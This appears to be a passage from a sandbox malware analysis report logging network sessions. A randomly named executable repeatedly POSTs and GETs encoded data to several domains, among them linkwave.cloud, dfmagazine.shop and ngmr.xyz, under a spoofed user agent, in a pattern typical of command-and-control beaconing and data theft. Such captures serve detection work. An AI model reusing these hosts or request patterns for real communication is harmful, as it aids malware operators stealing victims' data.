                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.whats-in-the-box.org
                                                                                  Origin: http://www.whats-in-the-box.org
                                                                                  Referer: http://www.whats-in-the-box.org/bqye/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:55:32.979970932 CEST | 1558 | OUT
                                                                                  Data Ascii: 57TW401GRfOZa+TbP3UmA8kW3DPC6RVIWPKvZzcFOl+5P/9gYkf70JHpRMFDmysSbLi8YmmEDwjiCVwY5TFy/KbUfVTIG4LF94mXa5sV3cn2gl4VbNK8eb3D3A8QOjFGPobvv8BhCcUFxIksa4JJeyFZY9eW3tFav3cOOTzxGM40/dV1tvW2j6ZVuNp/trDCP9xKzU+oWkqvfzxlcF8xgqnuW+osIfPDO63NpymsiL3BvGhQowt


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  9 | 192.168.11.20 | 49765 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:55:35.617120028 CEST | 554 | OUT | GET /bqye/?O4bP=9dRH6ZfHbJX&Xb3xI=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.whats-in-the-box.org
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:55:35.722799063 CEST | 398 | IN | HTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:55:35 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?O4bP=9dRH6ZfHbJX&Xb3xI=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o="}</script></head></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  10 | 192.168.11.20 | 49766 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:55:41.065438986 CEST | 816 | OUT | POST /was5/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.linkwave.cloud
                                                                                  Origin: http://www.linkwave.cloud
                                                                                  Referer: http://www.linkwave.cloud/was5/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=/+kHACa6XDHale6Bry12IIzvxbTmkm0+IT0B0godfNrLS1dEwHCt200AWhEvUvDgIVHffEkz4Jds049zEqT3RQSfmx+OIUnvjoatMRb8bA3mYOl3EkQonEQgc7R2Fx+o8CShClkVc/0WaX1knzs09cUljrlNx9XR/SobVE8nDv6sA33P0hIadCiNWSByq8RCUg==


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  11 | 192.168.11.20 | 49767 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:55:43.699075937 CEST | 836 | OUT | POST /was5/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.linkwave.cloud
                                                                                  Origin: http://www.linkwave.cloud
                                                                                  Referer: http://www.linkwave.cloud/was5/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=/+kHACa6XDHak/KBkxt2fYzwobTmuG0iIT4B0hc3f+PLSXFExC2tx00AZBEuL/D3IVCifF0z4N1s05NzHZr0QASBqR+IVEnvjoatMRPGbEbmY9t3EG0nkEQvf7R2Sh+s8CTECgAvc98WaVtkmis7oMUj87kl4Mio1Rcya0MCBc+rBhmVpT8+eR+/Si4ao+QZJg/O39jrgaOB6uHPVD+fF6k=


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  12 | 192.168.11.20 | 49768 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:55:46.340452909 CEST | 5156 | OUT | POST /was5/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.linkwave.cloud
                                                                                  Origin: http://www.linkwave.cloud
                                                                                  Referer: http://www.linkwave.cloud/was5/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:55:46.340565920 CEST | 2829 | OUT
                                                                                  Data Ascii: 4Tqw+PHZQwZbEErHKTpF2tw0BBTMDYG7L1ZN/NlEQ753pJNCw7twseuUOHzTzJWPyG/lDoUwjX5A7Vo4aX6PNnzm3l7Cn/f8KtFTQ4Knwg1l4TsXOSipjAsgVS3tCVHaeq07CvwLAw9SGkVy85wAxKLfX2UrBD7ZhW+NncaqlSaUxyQs/QytYrUO/gA0Y8gjf0oIoKTnQ3mgmHoiftH9LNJp7ukCcpY6xQ+R5nwnPO6fKzfcD2P


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  13 | 192.168.11.20 | 49769 | 3.33.130.190 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:55:48.974328041 CEST | 548 | OUT | GET /was5/?Xb3xI=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.linkwave.cloud
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:55:49.087491035 CEST | 398 | IN | HTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:55:49 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Xb3xI=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&O4bP=9dRH6ZfHbJX"}</script></head></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  14 | 192.168.11.20 | 49770 | 84.32.84.32 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:55:54.508985996 CEST | 819 | OUT | POST /7k8f/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dfmagazine.shop
                                                                                  Origin: http://www.dfmagazine.shop
                                                                                  Referer: http://www.dfmagazine.shop/7k8f/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=4z1WU9RqYjadMpuPDBvNvyXl0j97Tu3uZMyE5u6eArwA3Iz/dgm5xv99OYzuFpGw+walanqJAid/pmDC4y4rHCDiAVA2mPsi6XotBm5ce4D1rjs18BpIanJUGpwyUEKvD3FiptJBbqkVyW4K4JbNChVwO6UuUxr694T5l8TR2A2Rpw0Vdo48MBDEf8R5PIeJRw==


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  15 | 192.168.11.20 | 49771 | 84.32.84.32 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:55:57.269597054 CEST | 839 | OUT | POST /7k8f/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dfmagazine.shop
                                                                                  Origin: http://www.dfmagazine.shop
                                                                                  Referer: http://www.dfmagazine.shop/7k8f/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=4z1WU9RqYjadNJ+PPCHNqSXmpT97K+3qZM+E5uTDAdIAwoD/chm50v99JozvBpG/+wetamWJAiJ/pmTC5D4oBSDgP1A0pvsi6XotBnd2e4L1oTc1uwpHZnJbMJwyD0KrD3ENpsUkbv4VyXIK5bzOIhV6EaV5TQyK4M2Mk9KD/lKMsmlPAaMYPSf2bMoRNKfSM6Xv3zTP6LXywSgat2MT7pg=


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  16 | 192.168.11.20 | 49772 | 84.32.84.32 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:56:00.035566092 CEST | 1289 | OUT | POST /7k8f/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dfmagazine.shop
                                                                                  Origin: http://www.dfmagazine.shop
                                                                                  Referer: http://www.dfmagazine.shop/7k8f/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  17 | 192.168.11.20 | 49773 | 84.32.84.32 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:56:02.794814110 CEST | 549 | OUT | GET /7k8f/?O4bP=9dRH6ZfHbJX&Xb3xI=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dfmagazine.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:56:03.019337893 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                  Server: hcdn
                                                                                  Date: Wed, 25 Sep 2024 07:56:02 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 10072
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  x-hcdn-request-id: e4f3ce1ee073c64d008ff5ae72566668-asc-edge3
                                                                                  Expires: Wed, 25 Sep 2024 07:56:01 GMT
                                                                                  Cache-Control: no-cache
                                                                                  Accept-Ranges: bytes
                                                                                  Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  18 | 192.168.11.20 | 49774 | 54.67.87.110 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:56:08.468861103 CEST | 798 | OUT | POST /txr6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.ngmr.xyz
                                                                                  Origin: http://www.ngmr.xyz
                                                                                  Referer: http://www.ngmr.xyz/txr6/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=qRo7UWlGE2pUjX1GvRfcsDJjcuyOmHkIDr9TBB+ETZ0+INBdx/5maRbfm/TtzrI9Ie/VLkBRAXnQ5DxKjBnB2Tg+qWc24zm8iKBqUXZzBQMBtbZ6fV8c24uQ0n3zfauNJhp9z/Em4Wmw7owstNwyQxtEL9Pq2xz5Vs4+IU1nq4H44++y/Xp9dq16KZUivNrUpQ==
                                                                                  Sep 25, 2024 09:56:08.638649940 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 25 Sep 2024 08:18:34 GMT
                                                                                  X-Varnish: 1105030324
                                                                                  Age: 0
                                                                                  Via: 1.1 varnish
                                                                                  Connection: close
                                                                                  X-Varnish-Cache: MISS
                                                                                  Server: C2M Server v1.02
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  19 | 192.168.11.20 | 49775 | 54.67.87.110 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:56:11.179272890 CEST | 818 | OUT | POST /txr6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.ngmr.xyz
                                                                                  Origin: http://www.ngmr.xyz
                                                                                  Referer: http://www.ngmr.xyz/txr6/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrQ+Itxdw6ZmZRbf0fTo3rI6IezrLhhRAUbQ5BpKjWzOnTg4zmc48zm8iKBqUX9ZBUgBsqJ6OE8boouf3n3zbauzJhoez6gc4Uuw7ogstcwxaxtCP9OGxhmuNu4jYnJ3tr/z0IvoildZe5pIOptKtPqP0ePRQOUI4WwFoMCu5GTxOaM=
                                                                                  Sep 25, 2024 09:56:11.351583004 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 25 Sep 2024 08:18:36 GMT
                                                                                  X-Varnish: 1105030335
                                                                                  Age: 0
                                                                                  Via: 1.1 varnish
                                                                                  Connection: close
                                                                                  X-Varnish-Cache: MISS
                                                                                  Server: C2M Server v1.02
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  20 | 192.168.11.20 | 49776 | 54.67.87.110 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:56:13.890320063 CEST | 1289 | OUT | POST /txr6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.ngmr.xyz
                                                                                  Origin: http://www.ngmr.xyz
                                                                                  Referer: http://www.ngmr.xyz/txr6/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:56:13.890372038 CEST | 5156 | OUT
                                                                                  Sep 25, 2024 09:56:13.890443087 CEST | 1522 | OUT
                                                                                  Sep 25, 2024 09:56:14.071858883 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 25 Sep 2024 08:18:39 GMT
                                                                                  X-Varnish: 1105030363
                                                                                  Age: 0
                                                                                  Via: 1.1 varnish
                                                                                  Connection: close
                                                                                  X-Varnish-Cache: MISS
                                                                                  Server: C2M Server v1.02
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  21 | 192.168.11.20 | 49777 | 54.67.87.110 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:56:16.607481956 CEST | 542 | OUT | GET /txr6/?Xb3xI=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.ngmr.xyz
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:56:16.778028011 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 25 Sep 2024 08:18:42 GMT
                                                                                  X-Varnish: 1105030372
                                                                                  Age: 0
                                                                                  Via: 1.1 varnish
                                                                                  Connection: close
                                                                                  X-Varnish-Cache: MISS
                                                                                  Server: C2M Server v1.02
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  22 | 192.168.11.20 | 49778 | 194.58.112.174 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:56:22.387228012 CEST | 831 | OUT | POST /7cy1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.albero-dveri.online
                                                                                  Origin: http://www.albero-dveri.online
                                                                                  Referer: http://www.albero-dveri.online/7cy1/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Ascii: Xb3xI=AsGHKhpyYI3IW7wEhbPfjdX2HNEz12nn7LIbMZwB8oZPIcCSZntLxRUuEuzS2VruDxGlXeS28D+7BhrBQO/evvzeZx0MK5/czCQatURK/PKU+OelmKbXaPTmBF6J9nc53R1ksDII8+pQutz2hpiv1GOFX4YHvJ7IOZff8mdBMF6TdyqGKHstgoTLT24fPCynjw==
                                                                                  Sep 25, 2024 09:56:22.618781090 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:56:22 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Sep 25, 2024 09:56:22.618799925 CEST | 1289 | IN
                                                                                  Sep 25, 2024 09:56:22.618907928 CEST | 1246 | IN


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  23 | 192.168.11.20 | 49779 | 194.58.112.174 | 80 | 3276 | C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 25, 2024 09:56:25.166872025 CEST | 851 | OUT | POST /7cy1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.albero-dveri.online
